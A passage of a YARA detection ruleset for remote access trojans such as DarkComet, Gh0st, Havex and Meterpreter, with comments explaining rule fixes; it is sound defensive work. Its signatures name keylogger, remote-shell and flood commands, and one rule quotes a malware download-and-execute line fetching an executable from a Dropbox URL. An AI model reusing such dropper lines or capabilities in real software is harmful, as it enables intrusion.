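        $func1 = "FtpUrl"
        $func2 = "ScreenCapture"
        $func3 = "CaptureMouse"
        $func4 = "UploadFile"

        $ebanking1 = "Internet Banking" wide
        // $ebanking2/3/7 were written as plain text strings containing regex
        // syntax ("(Online Banking)|(Online banking)"), so they only matched the
        // literal parentheses and pipe and never the intended words. Converted
        // to regular expressions with the same alternatives.
        $ebanking2 = /(Online Banking)|(Online banking)/
        $ebanking3 = /(e-banking)|(e-Banking)/ nocase
        $ebanking4 = "login"
        $ebanking5 = "en ligne" wide
        $ebanking6 = "bancaires" wide
        $ebanking7 = /(eBanking)|(Ebanking)/ wide
        $ebanking8 = "Anmeldung" wide
        $ebanking9 = "internet banking" nocase wide
        $ebanking10 = "Banking Online" nocase wide
        $ebanking11 = "Web Banking" wide
        // very generic; together with $ebanking4 it makes "3 of ($ebanking*)" easy to reach
        $ebanking12 = "Power"

    condition:
        any of ($campaign*)
        or 2 of ($decoy*)
        or 2 of ($artifact*)
        or all of ($func*)
        or 3 of ($ebanking*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Bozok RAT: all five capability/export names are required.
rule Bozok : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/Bozok"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        $a = "getVer" nocase
        $b = "StartVNC" nocase
        $c = "SendCamList" nocase
        $d = "untPlugin" nocase
        $e = "gethostbyname" nocase   // generic Winsock import; only meaningful with the others

    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.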
*/
import "pe"

// Cerberus RAT: protocol check-in/ping tokens plus the family name.
rule Cerberus : RAT memory
{
    meta:
        description = "Cerberus"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-01-12"
        filetype = "memory"
        version = "1.0"

    strings:
        $checkin = "Ypmw1Syv023QZD"
        $clientpong = "wZ2pla"
        $serverping = "wBmpf3Pb7RJe"
        $generic = "cerberus" nocase   // broad on its own; any single string fires the rule

    condition:
        any of them
}

// Crimson RAT (Java): class paths as they appear inside the JAR's zip records.
rule Crimson: RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        Description = "Crimson Rat"
        date = "2015/05"
        ref = "http://malwareconfig.com/stats/Crimson"
        maltype = "Remote Access Trojan"
        filetype = "jar"

    strings:
        $a1 = "com/crimson/PK"
        $a2 = "com/crimson/bootstrapJar/PK"
        $a3 = "com/crimson/permaJarMulti/PermaJarReporter$1.classPK"
        $a4 = "com/crimson/universal/containers/KeyloggerLog.classPK"
        $a5 = "com/crimson/universal/UploadTransfer.classPK"

    condition:
        all of ($a*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// CyberGate RAT: "####@####"-delimited protocol blobs plus Delphi class names;
// one of the two resource markers must also be present.
rule CyberGate : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/CyberGate"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        // "####@####" + 4 encoded bytes + "####@####"
        $string1 = { 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23 }
        // "####@####" + 5 encoded bytes + "####@####"
        $string2 = { 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23 }
        $string3 = "EditSvr"
        $string4 = "TLoader"
        $string5 = "Stroks"
        $string6 = "####@####"
        $res1 = "XX-XX-XX-XX"
        $res2 = "CG-CG-CG-CG"

    condition:
        all of ($string*) and any of ($res*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/
import "pe"

// DarkComet RAT: command-channel tokens (#BOT#...), flood, keylogger and
// remote-shell identifiers. The parenthesised first character appears to be
// there so the rule source does not match itself — presumably, confirm.
rule DarkComet_1 : RAT
{
    meta:
        description = "DarkComet RAT"
        author = "botherder https://github.com/botherder"

    strings:
        $bot1 = /(#)BOT#OpenUrl/ wide ascii
        $bot2 = /(#)BOT#Ping/ wide ascii
        $bot3 = /(#)BOT#RunPrompt/ wide ascii
        $bot4 = /(#)BOT#SvrUninstall/ wide ascii
        $bot5 = /(#)BOT#URLDownload/ wide ascii
        $bot6 = /(#)BOT#URLUpdate/ wide ascii
        $bot7 = /(#)BOT#VisitUrl/ wide ascii
        $bot8 = /(#)BOT#CloseServer/ wide ascii

        $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii
        $ddos2 = /(D)DOSSYNFLOOD/ wide ascii
        $ddos3 = /(D)DOSUDPFLOOD/ wide ascii

        $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii
        $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii
        $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii
        $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii

        $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii
        $shell2 = /(S)UBMREMOTESHELL/ wide ascii
        $shell3 = /(K)ILLREMOTESHELL/ wide ascii

    condition:
        4 of ($bot*)
        or all of ($ddos*)
        or all of ($keylogger*)
        or all of ($shell*)
}

// DarkComet config-block delimiters, mutex prefix and key-command tokens.
rule DarkComet_2 : rat
{
    meta:
        description = "DarkComet"
        author = "Jean-Philippe Teissier / @Jipe_"
        date = "2013-01-12"
        filetype = "memory"
        version = "1.0"

    strings:
        $a = "#BEGIN DARKCOMET DATA --"
        $b = "#EOF DARKCOMET DATA --"
        $c = "DC_MUTEX-"
        $k1 = "#KCMDDC5#-890"
        $k2 = "#KCMDDC51#-890"

    condition:
        any of them
}

// Version-specific string sets: the 2.x set and the 3.x/4.x/5.x set.
rule DarkComet_3 : RAT
{
    meta:
        author = " Kevin Breen <kevin@techanarchy.net>"
        date = "2014/04"
        ref = "http://malwareconfig.com/stats/DarkComet"
        maltype = "Remote Access Trojan"
        filetype = "exe"

    strings:
        // Versions 2x
        $a1 = "#BOT#URLUpdate"
        $a2 = "Command successfully executed!"
        $a3 = "MUTEXNAME" wide
        $a4 = "NETDATA" wide

        // Versions 3x & 4x & 5x
        $b1 = "FastMM Borland Edition"   // Delphi memory manager banner; generic, but the whole set is required
        $b2 = "%s, ClassID: %s"
        $b3 = "I wasn't able to open the hosts file"
        $b4 = "#BOT#VisitUrl"
        $b5 = "#KCMDDC"

    condition:
        all of ($a*) or all of ($b*)
}

// Keylogger output file, not the binary: lines starting with ":: <Title>"
// and "(h:mm:ss AM/PM)" timestamps, repeated more than ten times each.
rule DarkComet_Keylogger_File : RAT
{
    meta:
        author = "Florian Roth"
        description = "Looks like a keylogger file created by DarkComet Malware"
        date = "25.07.14"
        reference = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
        score = 50

    strings:
        $magic = "::"
        $entry = /\n:: [A-Z]/
        $timestamp = /\([0-9]?[0-9]:[0-9][0-9]:[0-9][0-9] [AP]M\)/

    condition:
        ($magic at 0)
        and #entry > 10
        and #timestamp > 10
}

rule DarkComet_4 : RAT
{
    meta:
        reference = "https://github.com/bwall/bamfdetect/blob/master/BAMF_Detect/modules/yara/darkcomet.yara"

    strings:
        $a1 = "#BOT#"
        $a2 = "WEBCAMSTOP"
        $a3 = "UnActiveOnlineKeyStrokes"
        $a4 = "#SendTaskMgr"
        $a5 = "#RemoteScreenSize"
        $a6 = "ping 127.0.0.1 -n 4 > NUL &&"   // self-delete delay idiom

    condition:
        all of them
}

// Event-log rule (Windows Security log, event 4688 process creation / 4674
// privileged-object operation): the %TEMP%\MSDCSC drop path or the
// DC_MUTEX-<7 chars> mutex name.
rule DarkComet_5
{
    meta:
        maltype = "DarkComet RAT"
        author = "https://github.com/reed1713"
        description = "Malware creates the MSDCSC directory, which is a common path utilized by DarkComet, as well as the mutex pattern."

    strings:
        $type = "Microsoft-Windows-Security-Auditing"
        $eventid = "4688"
        $data = /AppData\\Local\\Temp\\MSDCSC\\.+\.exe/

        $type1 = "Microsoft-Windows-Security-Auditing"
        $eventid1 = "4674"
        $data1 = /DC_MUTEX-[0-9A-Z]{7}/

    condition:
        ($type and $eventid and $data)
        or ($type1 and $eventid1 and $data1)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
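*/
import "pe"

// Flying Kitten RAT ("Stealer"): keys on the .NET resource name and the build
// PDB path, then validates the PE header by hand (no pe-module dependency).
rule FlyingKitten : rat
{
    meta:
        Author = "CrowdStrike, Inc"
        Date = "2014/05/13"
        Description = "Flying Kitten RAT"
        Reference = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"

    strings:
        $classpath = "Stealer.Properties.Resources.resources"
        $pdbstr = "\\Stealer\\obj\\x86\\Release\\Stealer.pdb"

    condition:
        all of them
        // "MZ" at offset 0, "PE\0\0" at e_lfanew (uint32 at 0x3c)
        and uint16(0) == 0x5A4D
        and uint32(uint32(0x3c)) == 0x4550
        // COFF Characteristics (PE signature + 0x16) must not carry
        // IMAGE_FILE_DLL (0x2000): the sample is an EXE, not a DLL.
        // Parenthesised explicitly: YARA binds '&' tighter than '==' (the
        // opposite of C), so the unparenthesised original parsed as intended
        // but reads ambiguously to anyone coming from C.
        and (uint16(uint32(0x3C) + 0x16) & 0x2000) == 0
        and (
            // PE32 (optional-header magic 0x10b): CLR runtime header data
            // directory (index 14 → optional header + 96 + 14*8 = +208, i.e.
            // PE signature + 232) must be non-empty → managed (.NET) image.
            (uint16(uint32(0x3c)+24) == 0x010b and uint32(uint32(0x3c)+232) > 0)
            or
            // PE32+ (magic 0x20b): same directory at optional header + 112 + 112,
            // i.e. PE signature + 248.
            (uint16(uint32(0x3c)+24) == 0x020b and uint32(uint32(0x3c)+248) > 0)
        )
}

// Flying Kitten installer: both file names plus a CAB ("MSCF") header anywhere
// in the file.
rule CSIT_14003_03 : installer RAT
{
    meta:
        Author = "CrowdStrike, Inc"
        Date = "2014/05/13"
        Description = "Flying Kitten Installer"
        Reference = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"

    strings:
        $exename = "IntelRapidStart.exe"
        $confname = "IntelRapidStart.exe.config"
        $cabhdr = { 4d 53 43 46 00 00 00 00 }   // "MSCF" + reserved dword

    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.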
*/
import "pe"

// Gh0st RAT server DLL: bundled zlib banner, capability imports, SSDT helper,
// the default window station and a "Global\<...> %d" mutex/event format.
rule APT_WIN_Gh0st_ver : RAT
{
    meta:
        author = "@BryanNolen"
        date = "2012-12"
        type = "APT"
        version = "1.1"
        ref = "Detection of Gh0st RAT server DLL component"
        ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"

    strings:
        $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"
        // individually common Win32 imports; the rule requires the whole set
        $capability = "GetClipboardData"
        $capability1 = "capCreateCaptureWindowA"
        $capability2 = "CreateRemoteThread"
        $capability3 = "WriteProcessMemory"
        $capability4 = "LsaRetrievePrivateData"
        $capability5 = "AdjustTokenPrivileges"
        $function = "ResetSSDT"
        $window = "WinSta0\\Default"
        // "Global\" + 5-9 bytes + " %d"
        $magic = { 47 6C 6F 62 61 6C 5C [5-9] 20 25 64 }
        /* $magic = "Gh0st" */

    condition:
        all of them
}

rule Gh0st : RAT
{
    meta:
        description = "Gh0st"
        author = "botherder https://github.com/botherder"

    strings:
        $ = /(G)host/
        $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/
        $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/
        $ = /(%)s\\shell\\open\\command/
        $ = /(G)etClipboardData/
        $ = /(W)riteProcessMemory/
        $ = /(A)djustTokenPrivileges/
        $ = /(W)inSta0\\Default/
        // resource/dialog control class ordinals
        $ = /(#)32770/
        $ = /(#)32771/
        $ = /(#)32772/
        $ = /(#)32774/

    condition:
        // anonymous strings: all twelve must be present
        all of them
}

rule gh0st
{
    meta:
        author = "https://github.com/jackcr/"

    strings:
        // "Gh0st" packet tag, 8 bytes of header, then 78 9C (zlib stream header)
        $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }
        $b = "Gh0st Update"

    condition:
        any of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/
import "pe"

// Gholee: the two gholee* rules below are repeated verbatim as MW_gholee_v1 /
// MW_gholee_v2 further down (same strings, same conditions, different meta).
rule gholeeV1
{
    meta:
        Author = "@GelosSnake"
        Date = "2014/08"
        Description = "Gholee first discovered variant "
        Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"

    strings:
        $a = "sandbox_avg10_vc9_SP1_2011"
        $b = "gholee"

    condition:
        all of them
}

// Second variant: mostly opaque code/data fragments; every string is required.
rule gholeeV2
{
    meta:
        Author = "@GelosSnake"
        Date = "2015-02-12"
        Description = "Gholee first discovered variant "
        Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"

    strings:
        $string0 = "RichHa"
        $string1 = " ((((( H" wide
        $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
        $string3 = "<8;$O' "
        $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
        $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
        $string6 = "urn:schemas-microsoft-com:asm.v1"
        $string7 = "8.848H8O8i8s8y8"
        $string8 = "wrapper3" wide
        $string9 = "pwwwwwwww"
        $string10 = "Sunday"
        $string11 = "YYuTVWh"
        $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
        $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
        $string15 = "wrapper3 Version 1.0" wide
        $string16 = "77A779"
        $string17 = "<C<G<M<R<X<"
        $string18 = "9 9-9N9X9s9"

    condition:
        // there is no $string14, so the rule declares exactly 18 strings and
        // "18 of them" is the same as "all of them"
        18 of them
}

rule MW_gholee_v1 : v1
{
    meta:
        Author = "@GelosSnake"
        description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
        date = "2014-08"
        maltype = "Remote Access Trojan"
        sample_filetype = "dll"
        hash0 = "48573a150562c57742230583456b4c02"

    strings:
        $a = "sandbox_avg10_vc9_SP1_2011"
        $b = "gholee"

    condition:
        all of them
}

rule MW_gholee_v2 : v2
{
    meta:
        author = "@GelosSnake"
        date = "2015-02-12"
        description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
        hash0 = "05523761ca296ec09afdf79477e5f18d"
        hash1 = "08e424ac42e6efa361eccefdf3c13b21"
        hash2 = "5730f925145f1a1cd8380197e01d9e06"
        hash3 = "73461c8578dd9ab86d42984f30c04610"
        sample_filetype = "dll"

    strings:
        $string0 = "RichHa"
        $string1 = " ((((( H" wide
        $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
        $string3 = "<8;$O' "
        $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
        $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
        $string6 = "urn:schemas-microsoft-com:asm.v1"
        $string7 = "8.848H8O8i8s8y8"
        $string8 = "wrapper3" wide
        $string9 = "pwwwwwwww"
        $string10 = "Sunday"
        $string11 = "YYuTVWh"
        $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
        $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
        $string15 = "wrapper3 Version 1.0" wide
        $string16 = "77A779"
        $string17 = "<C<G<M<R<X<"
        $string18 = "9 9-9N9X9s9"

    condition:
        // 18 strings declared (no $string14): equivalent to "all of them"
        18 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

rule glassrat: RAT
{
    meta:
        author = "Brian Wallace @botnet_hunter"

    strings:
        $a = "PostQuitMessage"   // generic Win32 import; only meaningful alongside $b
        $b = "pwlfnn10,gzg"
        $c = "update.dll"
        $d = "_winver"

    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Havex OPC scanner module: the DLL name or any of its (misspelled) status
// messages, in a file that starts with "MZ".
rule Win32OPCHavex
{
    meta:
        Author = "BAE Systems"
        Date = "2014/06/23"
        Description = "Rule for identifying OPC version of HAVEX"
        Reference = "www.f-secure.com/weblog/archives/00002718.html"

    strings:
        $mzhdr = "MZ"
        $dll = "7CFC52CD3F87.dll"
        $a1 = "Start finging of LAN hosts..." wide
        $a2 = "Finding was fault. Unexpective error" wide
        $a3 = "Was found %i hosts in LAN:" wide
        $a4 = "Hosts was't found." wide
        $a5 = "Start finging of OPC Servers..." wide
        $a6 = "Was found %i OPC Servers." wide
        $a7 = "OPC Servers not found. Programm finished" wide
        $a8 = "%s[%s]!!!EXEPTION %i!!!" wide
        $a9 = "Start finging of OPC Tags..." wide

    condition:
        $mzhdr at 0 and ($dll or (any of ($a*)))
}

// Havex "Fertger" build: named pipes, working files and family names.
rule Win32FertgerHavex
{
    meta:
        Author = "BAE Systems"
        Date = "2014/06/23"
        Description = "Rule for identifying Fertger version of HAVEX"
        Reference = "www.f-secure.com/weblog/archives/00002718.html"

    strings:
        $mz = "MZ"
        $a1 = "\\\\.\\pipe\\mypipe-f" wide
        $a2 = "\\\\.\\pipe\\mypipe-h" wide
        $a3 = "\\qln.dbx" wide
        $a4 = "*.yls" wide
        $a5 = "\\*.xmd" wide
        $a6 = "fertger" wide
        $a7 = "havex"

    condition:
        $mz at 0 and 3 of ($a*)
}

// Server side: the PHP C2 script rather than the Windows implant.
rule Havex_Trojan_PHP_Server
{
    meta:
        Author = "Florian Roth"
        Date = "2014/06/24"
        Description = "Detects the PHP server component of the Havex RAT"
        Reference = "www.f-secure.com/weblog/archives/00002718.html"

    strings:
        $s1 = "havex--></body></head>"
        $s2 = "ANSWERTAG_START"
        $s3 = "PATH_BLOCKFILE"

    condition:
        all of them
}

// Havex process image carved from a memory dump: "MZ" at 0 plus either three
// of the bracketed status strings or the specific sample file name.
rule SANS_ICS_Cybersecurity_Challenge_400_Havex_Memdump : memory
{
    meta:
        description = "Detects Havex Windows process executable from memory dump"
        date = "2015-12-2"
        author = "Chris Sistrunk"
        hash = "8065674de8d79d1c0e7b3baf81246e7d"

    strings:
        $magic = { 4d 5a }   // "MZ"
        $s1 = "~tracedscn.yls" fullword wide
        $s2 = "[!]Start" fullword wide
        $s3 = "[+]Get WSADATA" fullword wide
        $s4 = "[-]Can not get local ip" fullword wide
        $s5 = "[+]Local:" fullword wide
        $s6 = "[-]Threads number > Hosts number" fullword wide
        $s7 = "[-]Connection error" fullword wide
        $x1 = "bddd4e2b84fa2ad61eb065e7797270ff.exe" fullword wide

    condition:
        $magic at 0 and ( 3 of ($s*) or $x1 )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
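*/
// hiZor RAT (Fidelis FTA-1020). The byte patterns cover the string-stacking
// and XOR-decode loops; the plain strings are supporting indicators only
// (several are ordinary Win32 names), which is why every string is required.
rule apt_win32_dll_rat_hiZor_RAT: RAT
{
    meta:
        description = "Detects hiZor RAT"
        hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
        hash2 = "d9821468315ccd3b9ea03161566ef18e"
        hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
        ref1 = "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html"
        ref2 = "https://github.com/Neo23x0/Loki/blob/b187ed063d73d0defc6958100ca7ad04aa77fc12/signatures/apt_hizor_rat.yar"
        reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"

    strings:
        // Part of the encoded User-Agent = Mozilla
        $s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 }
        // XOR to decode User-Agent after string stacking 0x10001630
        $s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? }
        // XOR with 0x2E - 0x10002EF6
        $s3 = { 80 [2] 2e 40 3b ?? 72 ?? }
        $s4 = "CmdProcessExited" wide ascii
        $s5 = "rootDir" wide ascii
        $s6 = "DllRegisterServer" wide ascii
        $s7 = "GetNativeSystemInfo" wide ascii
        $s8 = "%08x%08x%08x%08x" wide ascii

    condition:
        // PE ("MZ") or ELF magic. The original compared uint32(0) with
        // 0x4464c457f — a 9-hex-digit value no 32-bit read can equal, so the
        // ELF branch could never fire. The ELF magic 7F 45 4C 46 read
        // little-endian is 0x464c457f. (The strings are Windows artifacts, so
        // the ELF branch is unlikely to matter in practice, but it is now live.)
        (uint16(0) == 0x5A4D or uint32(0) == 0x464c457f) and (all of them)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.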
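*/
/*
   Yara Rule Set
   Author: Florian Roth
   Date: 2015-10-01
   Identifier: Indetectables RAT
*/

// Indetectables RAT: author/crypter tags in a PE under 5 MB; any one is enough.
rule Indetectables_RAT: RAT
{
    meta:
        description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
        author = "Florian Roth"
        reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
        date = "2015-10-01"
        super_rule = 1
        hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
        hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
        hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"

    strings:
        $s1 = "Coded By M3" fullword wide
        $s2 = "Stub Undetector M3" fullword wide
        $s3 = "www.webmenegatti.com.br" wide
        $s4 = "M3n3gatt1" fullword wide
        $s5 = "TheMisterFUD" fullword wide
        $s6 = "KillZoneKillZoneKill" fullword ascii
        $s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
        $s8 = "M3_F_U_D_M3" ascii
        $s9 = "M3n3gatt1hack3r" fullword wide
        $s9a = "M3n3gatt1hack3r" fullword ascii

    condition:
        uint16(0) == 0x5a4d and filesize < 5000KB and 1 of them
}

// Same author's downloader: build path / hard-coded download line ($x*) or two
// of the embedded script fragments ($s*).
rule BergSilva_Malware : RAT
{
    meta:
        description = "Detects a malware from the same author as the Indetectables RAT"
        author = "Florian Roth"
        date = "2015-10-01"
        super_rule = 1
        hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
        hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"

    strings:
        $x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
        $x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide
        $s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
        $s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
        $s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
        $s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
        $s5 = "https://dl.dropbox.com/u/105015858" wide

    condition:
        uint16(0) == 0x5a4d and ( 1 of ($x*) or 2 of ($s*) )
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// FTA-1020 DLL: stacked/encoded strings (User-Agent, Run key) and the XOR
// decode loops, identified by their code bytes. Anonymous strings, all required.
rule apt_win32_dll_rat_1a53b0cp32e46g0qio7
{
    meta:
        author = "https://www.fidelissecurity.com/"
        info = "Indicators for FTA-1020"
        hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
        hash2 = "d9821468315ccd3b9ea03161566ef18e"
        hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
        reference = "https://github.com/fideliscyber"

    strings:
        // Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0;rv:11.0) like Gecko
        $ = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 }
        // offset 10001566
        // Software\Microsoft\Windows\CurrentVersion\Run
        $ = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 }
        // 10003D09
        $ = { 66 [4-7] 0d 40 83 f8 44 7c ?? }
        // xor word ptr [ebp+eax*2+var_5C], 14h
        // inc eax
        // cmp eax, 14h
        // Loop to decode a static string. It reveals the "1a53b0cp32e46g0qio9" static string sent in the beacon
        $ = { 66 [4-7] 14 40 83 f8 14 7c ?? }
        // 100017F0
        $ = { 66 [4-7] 56 40 83 f8 2d 7c ?? }
        // 10003621
        $ = { 66 [4-7] 20 40 83 f8 1a 7c ?? }
        // 10003640
        $ = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? }
        // 10003930
        $ = "%08x%08x%08x%08x" wide ascii
        $ = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii

    condition:
        // PE ("MZ") or ELF magic. The original used 0x4464c457f, a 9-hex-digit
        // value that no uint32() read can equal, leaving the ELF branch dead;
        // the ELF magic 7F 45 4C 46 read little-endian is 0x464c457f.
        (uint16(0) == 0x5A4D or uint32(0) == 0x464c457f) and (all of them)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Meterpreter reverse-TCP stager/server artifacts in process memory.
rule Meterpreter_Reverse_Tcp
{
    meta:
        // This is the standard backdoor/RAT from Metasploit, could be used by any actor
        author = "chort (@chort0)"
        description = "Meterpreter reverse TCP backdoor in memory. Tested on Win7x64."

    strings:
        $a = { 4d 45 54 45 52 50 52 45 54 45 52 5f 54 52 41 4e 53 50 4f 52 54 5f 53 53 4c [32-48] 68 74 74 70 73 3a 2f 2f 58 58 58 58 58 58 }   // METERPRETER_TRANSPORT_SSL … https://XXXXXX
        $b = { 4d 45 54 45 52 50 52 45 54 45 52 5f 55 41 }   // METERPRETER_UA
        $c = { 47 45 54 20 2f 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2f 31 2e 30 }   // GET /123456789 HTTP/1.0
        $d = { 6d 65 74 73 72 76 2e 64 6c 6c [2-4] 52 65 66 6c 65 63 74 69 76 65 4c 6f 61 64 65 72 }   // metsrv.dll … ReflectiveLoader

    condition:
        // the SSL transport blob alone, or the UA / metsrv marker together with
        // the placeholder GET request
        $a or (any of ($b, $d) and $c)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.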
*/
// NanoCore RAT family. Small PEs need only one indicator; larger or
// non-PE inputs need more.
rule Nanocore_RAT_Gen_1
{
    meta:
        description = "Detetcs the Nanocore RAT and similar malware"
        author = "Florian Roth"
        reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
        date = "2016-04-22"
        score = 70
